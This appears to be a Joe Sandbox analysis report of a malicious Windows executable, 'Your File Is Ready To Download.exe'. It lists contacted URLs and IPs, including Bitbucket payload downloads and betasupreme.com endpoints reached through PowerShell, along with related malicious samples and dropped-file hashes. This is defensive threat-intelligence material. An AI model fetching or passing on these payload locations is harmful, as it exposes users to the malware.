https://autohotkey.comCould	Your File Is Ready To Download.exe	false	URL Reputation: safe	unknown
https://clients2.google.com	c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	false		high
https://bbuseruploads.s3.amazonaws.com/J	Your File Is Ready To Download.exe, 00000001.00000003.286300148.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368975906.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369414423.00000000001A6000.00000004.00000001.sdmp	false		high
https://bitbucket.org/	Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.329713012.000002692DFFB000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	mirroring_hangouts.js.11.dr	false		high
https://dns.google	c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d4275cfd-ccb1-4009-b9d1-09d7468f2cf1.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	false	URL Reputation: safe	unknown
https://ogs.google.com	c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	false		high
https://sectigo.com/CPS0	Your File Is Ready To Download.exe	false	URL Reputation: safe	unknown
https://support.google.com/chromecast/troubleshooter/2995236	messages.json87.11.dr, messages.json18.11.dr, messages.json70.11.dr, messages.json47.11.dr, messages.json37.11.dr, messages.json16.11.dr, messages.json31.11.dr, messages.json22.11.dr, messages.json1.11.dr, feedback.html.11.dr, messages.json13.11.dr, messages.json86.11.dr, messages.json82.11.dr, messages.json69.11.dr, messages.json8.11.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.318116285.000002691DFF0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000008.00000002.318543310.000002691E172000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.318116285.000002691DFF0000.00000004.00000001.sdmp	false		high
http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions	mirroring_hangouts.js.11.dr	false		high
https://betasupreme.com/i/?checksafe=	powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000008.00000002.327714782.000002691F54B000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.296712834.000002691FB60000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.296556667.000002691FA63000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipKs	Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmp	false		high
https://www.google.com;	manifest.json.11.dr	false	Avira URL Cloud: safe	low
https://contoso.com/Icon	powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git	pnacl_public_x86_64_libpnacl_irt_shim_a.11.dr, pnacl_public_x86_64_ld_nexe.11.dr	false		high
https://hangouts.google.com/	manifest.json.11.dr	false		high
https://betasupreme.com/i/?nx=	powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://betasupreme.com	powershell.exe, 00000008.00000002.319890273.000002691E9C7000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319883093.000002691E9B3000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319837164.000002691E980000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.318116285.000002691DFF0000.00000004.00000001.sdmp	false		high
https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipR	Your File Is Ready To Download.exe, 00000001.00000003.286300148.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284791057.00000000001A6000.00000004.00000001.sdmp	false		high
https://meetings.clients6.google.com	mirroring_hangouts.js.11.dr	false		high
https://play.google.com/log?format=json&hasfast=true	mirroring_hangouts.js.11.dr	false		high
https://code.google.com/p/nativeclient/issues/entry%s:	pnacl_public_x86_64_ld_nexe.11.dr	false		high
http://tools.ietf.org/html/rfc1950	mirroring_hangouts.js.11.dr	false		high
https://bitbucket.org/Hl	Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmp	false		high
https://code.google.com/p/nativeclient/issues/entry	pnacl_public_x86_64_ld_nexe.11.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000008.00000002.318543310.000002691E172000.00000004.00000001.sdmp	false		high
https://support.google.com/chromecast/answer/2998456	messages.json87.11.dr, messages.json18.11.dr, messages.json70.11.dr, messages.json47.11.dr, messages.json37.11.dr, messages.json16.11.dr, messages.json31.11.dr, messages.json22.11.dr, messages.json1.11.dr, feedback.html.11.dr, messages.json13.11.dr, messages.json86.11.dr, messages.json82.11.dr, messages.json69.11.dr, messages.json8.11.dr	false		high
https://secure.comodo.com/CPS0L	Your File Is Ready To Download.exe	false		high
https://bbuseruploads.s3.amazonaws.com/6ba4c15f-1d12-46cc-bdb7-164bb91831c3/downloads/c0187cad-0ad4-	Your File Is Ready To Download.exe, 00000001.00000003.284765053.0000000000176000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369359743.000000000016B000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368941847.000000000016B000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284754452.0000000000168000.00000004.00000001.sdmp	false		high
https://clients2.googleusercontent.com	c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	false		high
https://docs.google.com	mirroring_common.js.11.dr	false		high
https://bbuseruploads.s3.amazonaws.com/	Your File Is Ready To Download.exe, 00000001.00000003.286300148.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368975906.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284791057.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369414423.00000000001A6000.00000004.00000001.sdmp	false		high
https://feedback.googleusercontent.com	manifest.json.11.dr	false		high
https://chromium.googlesource.com/a/native_client/pnacl-clang.git	pnacl_public_x86_64_libpnacl_irt_shim_a.11.dr, pnacl_public_x86_64_ld_nexe.11.dr	false		high
https://clients2.google.com/service/update2/crx	powershell.exe, 00000008.00000002.319890273.000002691E9C7000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319883093.000002691E9B3000.00000004.00000001.sdmp, manifest.json.11.dr	false		high
https://clients6.google.com	mirroring_hangouts.js.11.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.109	accounts.google.com	United States	15169	GOOGLEUS	false
142.250.186.78	clients.l.google.com	United States	15169	GOOGLEUS	false
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.181.228	www.google.com	United States	15169	GOOGLEUS	false
52.217.81.204	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
142.250.186.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	535019
Start date:	06.12.2021
Start time:	19:07:38
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Your File Is Ready To Download.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal51.evad.winEXE@41/255@6/8
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 3.9% (good quality ratio 1.6%) Quality average: 20.4% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 94% Number of executed functions: 174 Number of non-executed functions: 56
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 142.250.184.206, 173.194.188.169, 34.104.35.123, 142.250.181.227, 142.250.186.67, 142.250.186.99, 172.217.18.106, 142.250.184.202, 142.250.184.234, 216.58.212.138, 142.250.185.74, 142.250.185.106, 142.250.185.138, 142.250.185.170, 142.250.185.202, 142.250.185.234, 142.250.181.234, 172.217.16.138, 216.58.212.170, 142.250.74.202, 142.250.186.42, 142.250.186.74 Excluded domains from analysis (whitelisted): fp.msedge.net, www.bing.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.googleapis.com, r4---sn-4g5edns6.gvt1.com, arc.msn.com, ris.api.iris.microsoft.com, r4.sn-4g5edns6.gvt1.com, site-cdn.onenote.net, redirector.gvt1.com, edgedl.me.gvt1.com, update.googleapis.com, aed21723d7a35cc55d1c8458f9a29d12.clo.footprintdns.com, fp-as.azureedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.gstatic.com, fp-vs.azureedge.net Execution Graph export aborted for target powershell.exe, PID 160 because it is empty Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtSetInformationFile calls found. Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:08:31	API Interceptor	1x Sleep call for process: Your File Is Ready To Download.exe modified
19:08:36	API Interceptor	40x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.192.141.1	AhB0i1fe7I.exe	Get hash	malicious	Browse	bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe
104.192.141.1	cj6LIPaeUz.exe	Get hash	malicious	Browse	bitbucket.org/abobik141231321/download/downloads/main.exe
239.255.255.250	Microsoft Document.htm	Get hash	malicious	Browse
	File.html	Get hash	malicious	Browse
	SecuredMessage.html	Get hash	malicious	Browse
	INV.htm	Get hash	malicious	Browse
	Lynn.schaffer-VoiceFax-450-6214-450.html	Get hash	malicious	Browse
	Microsoft Document.htm	Get hash	malicious	Browse
	Microsoft Document.htm	Get hash	malicious	Browse
	Carl.shepherd-VoiceFax-720-6145-720.html	Get hash	malicious	Browse
	SecuredMessage.html	Get hash	malicious	Browse
	SecuredMessage.html	Get hash	malicious	Browse
	Ellie@letsdefend.io_63963965Application.HTML	Get hash	malicious	Browse
	pkeyuibx.exe	Get hash	malicious	Browse
	#Ud83d#Udce8 INV statement.htm	Get hash	malicious	Browse
	message_zdm.html	Get hash	malicious	Browse
	SecuredMessage.html	Get hash	malicious	Browse
	frn6tJYUYE.exe	Get hash	malicious	Browse
	adf3fb72f8855baa050d1e7c5a15944abeb1ae775570a.exe	Get hash	malicious	Browse
	P7OHIqXG6Q.exe	Get hash	malicious	Browse
	hZiWKNIiQa.exe	Get hash	malicious	Browse
	37p5YiZbUq.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
s3-w.us-east-1.amazonaws.com	kTkn3vyiUy.exe	Get hash	malicious	Browse	52.216.207.131
	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.exe	Get hash	malicious	Browse	52.217.41.148
	eaGU6Cv0gg.exe	Get hash	malicious	Browse	52.216.92.51
	9n0CP1V43a.exe	Get hash	malicious	Browse	52.216.177.171
	W7sGObBwAn.exe	Get hash	malicious	Browse	52.217.202.65
	S2pmCqOFEf.exe	Get hash	malicious	Browse	52.216.166.67
	HackLoader.exe	Get hash	malicious	Browse	52.217.109.12
	koCttsCjGY.exe	Get hash	malicious	Browse	52.216.97.251
	xa3MFotret.exe	Get hash	malicious	Browse	52.217.0.156
	ZoIFGukoKF.exe	Get hash	malicious	Browse	52.216.245.44
	Software.exe	Get hash	malicious	Browse	52.217.139.9
	tPeqQ3eAMv.exe	Get hash	malicious	Browse	52.217.69.188
	4gGVDFoTz5.exe	Get hash	malicious	Browse	52.216.140.236
	g3g1VECs9K.exe	Get hash	malicious	Browse	52.217.129.129
	gm8n7Rb1Jm.exe	Get hash	malicious	Browse	52.217.198.105
	ByUt7Ek6wr.exe	Get hash	malicious	Browse	52.217.40.140
	ZlIz9BE8kS.exe	Get hash	malicious	Browse	52.217.111.212
	0db013bfab20f8a23d5f90f2e97a96c5dded8f7cb5e78.exe	Get hash	malicious	Browse	52.217.172.241
	9ixVTXVlYr.exe	Get hash	malicious	Browse	52.217.89.100
	build.exe	Get hash	malicious	Browse	52.216.170.203

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	WQGMJ563650.VBS	Get hash	malicious	Browse	13.224.94.100
	girlPowDoor.dll	Get hash	malicious	Browse	13.224.92.74
	triage_dropped_file.dll	Get hash	malicious	Browse	13.224.92.74
	triage_dropped_file.dll	Get hash	malicious	Browse	13.224.92.74
	loadYouYou.dll	Get hash	malicious	Browse	13.224.92.74
	Potvrda narudzbe.exe	Get hash	malicious	Browse	3.1.123.15
	Carl.shepherd-VoiceFax-720-6145-720.html	Get hash	malicious	Browse	13.224.96.127
	4YBPd142PJ.exe	Get hash	malicious	Browse	3.1.123.15
	youLoadLike.dll	Get hash	malicious	Browse	13.224.92.74
	girlNextDoor.dll	Get hash	malicious	Browse	13.224.92.74
	Bidamedipharms Order.xlsx	Get hash	malicious	Browse	44.227.65.245
	Payment.exe	Get hash	malicious	Browse	3.64.163.50
	5Wyf63nkds	Get hash	malicious	Browse	34.249.145.219
	5MN72aPrlW	Get hash	malicious	Browse	34.249.145.219
	77q8JbGUj8	Get hash	malicious	Browse	34.249.145.219
	8PD7aLdn1W	Get hash	malicious	Browse	18.133.169.26
	8uCd1MPE4h	Get hash	malicious	Browse	34.249.145.219
	6o94i5G7Aj	Get hash	malicious	Browse	54.124.163.225
	1Zk3QhAdHv	Get hash	malicious	Browse	108.148.246.202
	OgGDUAxBKd	Get hash	malicious	Browse	34.249.145.219
AMAZON-02US	WQGMJ563650.VBS	Get hash	malicious	Browse	13.224.94.100
	girlPowDoor.dll	Get hash	malicious	Browse	13.224.92.74
	triage_dropped_file.dll	Get hash	malicious	Browse	13.224.92.74
	triage_dropped_file.dll	Get hash	malicious	Browse	13.224.92.74
	loadYouYou.dll	Get hash	malicious	Browse	13.224.92.74
	Potvrda narudzbe.exe	Get hash	malicious	Browse	3.1.123.15
	Carl.shepherd-VoiceFax-720-6145-720.html	Get hash	malicious	Browse	13.224.96.127
	4YBPd142PJ.exe	Get hash	malicious	Browse	3.1.123.15
	youLoadLike.dll	Get hash	malicious	Browse	13.224.92.74
	girlNextDoor.dll	Get hash	malicious	Browse	13.224.92.74
	Bidamedipharms Order.xlsx	Get hash	malicious	Browse	44.227.65.245
	Payment.exe	Get hash	malicious	Browse	3.64.163.50
	5Wyf63nkds	Get hash	malicious	Browse	34.249.145.219
	5MN72aPrlW	Get hash	malicious	Browse	34.249.145.219
	77q8JbGUj8	Get hash	malicious	Browse	34.249.145.219
	8PD7aLdn1W	Get hash	malicious	Browse	18.133.169.26
	8uCd1MPE4h	Get hash	malicious	Browse	34.249.145.219
	6o94i5G7Aj	Get hash	malicious	Browse	54.124.163.225
	1Zk3QhAdHv	Get hash	malicious	Browse	108.148.246.202
	OgGDUAxBKd	Get hash	malicious	Browse	34.249.145.219

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	WiO23EL8bF.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	11200.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	File.html	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	323591_039.pdf.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	11449.scr.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	Potvrda narudzbe.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	u prilogu je nova narudzba za kupnju.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	build2.doc	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	summetonerne.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	SecuriteInfo.com.__vbaHresultCheckObj.23524.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	Statement of Account as of 12062021.xls	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	SecuredMessage.html	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	PREVIOUS CONVERSATION.pdf.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	pkeyuibx.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	Facturas DHL Parcel 48_20211206.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	Facturas DHL Parcel 48_06122021.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	CrDDSBydnG.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	CrDDSBydnG.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	#Ud83d#Udce8 INV statement.htm	Get hash	malicious	Browse	52.217.81.204 104.192.141.1
	KK1TMPtU6z.exe	Get hash	malicious	Browse	52.217.81.204 104.192.141.1

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe	Microsoft Document.htm	Get hash	malicious	Browse
	File.html	Get hash	malicious	Browse
	SecuredMessage.html	Get hash	malicious	Browse
	Microsoft Document.htm	Get hash	malicious	Browse
	Microsoft Document.htm	Get hash	malicious	Browse
	Carl.shepherd-VoiceFax-720-6145-720.html	Get hash	malicious	Browse
	SecuredMessage.html	Get hash	malicious	Browse
	pkeyuibx.exe	Get hash	malicious	Browse
	#Ud83d#Udce8 INV statement.htm	Get hash	malicious	Browse
	message_zdm.html	Get hash	malicious	Browse
	SecuredMessage.html	Get hash	malicious	Browse
	cC6A9znVtH.exe	Get hash	malicious	Browse
	TaylormadegolfFile Received December 03,2021-03_43_52 AM.html	Get hash	malicious	Browse
	Todd.neely-VoiceFax-572-2536-572.html	Get hash	malicious	Browse
	michael.schwab-1VN.htm	Get hash	malicious	Browse
	4HhMAtU4Ok.exe	Get hash	malicious	Browse
	Payment Confirmation.html	Get hash	malicious	Browse
	AX-426495-pdf.htm	Get hash	malicious	Browse
	'Vm Note'jgable On Thu, 02 Dec 2021 001533 +0100.html	Get hash	malicious	Browse
	PaymentAdvice_53-44955876.htm	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	451603
Entropy (8bit):	5.009711072558331
Encrypted:	false
SSDEEP:	12288:ZHfRTyGZ6lup8Cfrvq4JBPKh+FBlESBw4p6:NfOCzvRKhGvwJ
MD5:	A78AD14E77147E7DE3647E61964C0335
SHA1:	CECC3DD41F4CEA0192B24300C71E1911BD4FCE45
SHA-256:	0D6803758FF8F87081FAFD62E90F0950DFB2DD7991E9607FE76A8F92D0E893FA
SHA-512:	DDE24D5AD50D68FC91E9E325D31E66EF8F624B6BB3A07D14FFED1104D3AB5F4EF1D7969A5CDE0DFBB19CB31C506F7DE97AF67C2F244F7E7E8E10648EA8321101
Malicious:	false
Reputation:	high, very likely benign file
Preview:	BDic.... ....6...."..Z..4g....6.2...{/...3...5....AF 1363.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ

C:\Users\user\AppData\Local\Google\Chrome\User Data\0a8577d8-4c45-4993-9311-a8f991b6ac23.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	189511
Entropy (8bit):	6.045222825600431
Encrypted:	false
SSDEEP:	3072:H8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:cjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
MD5:	DAC43F6C68D10D4B09DFF418FCB32275
SHA1:	FA6590D2ADD97C6742FFC1C1AFE5DE10A17CE667
SHA-256:	6AE48E46599BB286D41276C1845D2179BCBDF6D8A070DE5CFEEB6F18104361A9
SHA-512:	9AE216AA60728F6D7542468D2D569F459890BFD44D6159CE9BD3C61DC03B2CE1899D2829BAF52D3A707DACFDE420BBB20C573A53A9C8E5AED4A7515B3F764260
Malicious:	false
Reputation:	low
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Google\Chrome\User Data\0da807b5-fddb-4ece-8b19-3e1667cffc25.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	189605
Entropy (8bit):	6.045488285632766
Encrypted:	false
SSDEEP:	3072:q8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:rjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
MD5:	3FFD73F9E5718D722FF2012F1CD49DCF
SHA1:	E23AFF0EFFDEE0DB365B5D2DB5B99B1C8835461E
SHA-256:	7C8D9EDF38CE3AD6DB57FC16D62E41686CC9BC32729D689D2C36C8C4C3FC67B1
SHA-512:	61543123BD8DF7B63552384EB9B45769867FA4107D0821D80CF2479407B97205C5A8E5DFF398B0D29E65721B9DE45F963A89361DF15421022C09ADC132175CFF
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Google\Chrome\User Data\2a6dfe04-c976-4ba3-88f6-7fe64ac2d1ae.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SysEx File -
Category:	dropped
Size (bytes):	94708
Entropy (8bit):	3.7427683621330914
Encrypted:	false
SSDEEP:	384:l9JQfn9CcpWdBVOUD+N7rwvXN3AfVMHlkGcbr2hbfxwpx1Arq3my1iNzTTcOxZ7F:7xGa11yZ0csezvRJYnH+VKPdT5D
MD5:	A95E66E95D905D36656EBB64AE3D0C0E
SHA1:	EDB90ABA546D0B49AF5D04D0D324760A6DF9862A
SHA-256:	F8E19D6896EAECFD04F4593E4E3B56821F2A7F4F80BD53C0D880A9670E55A826
SHA-512:	CAB90882A03A4317C0A400EC815FC5D23DD8D2C74BC5CCA1BF3185445683E3FB907138CFC0FE3C24237C9AA25BBAF3344D2E313AB4A22520810811EB441DF1E7
Malicious:	false
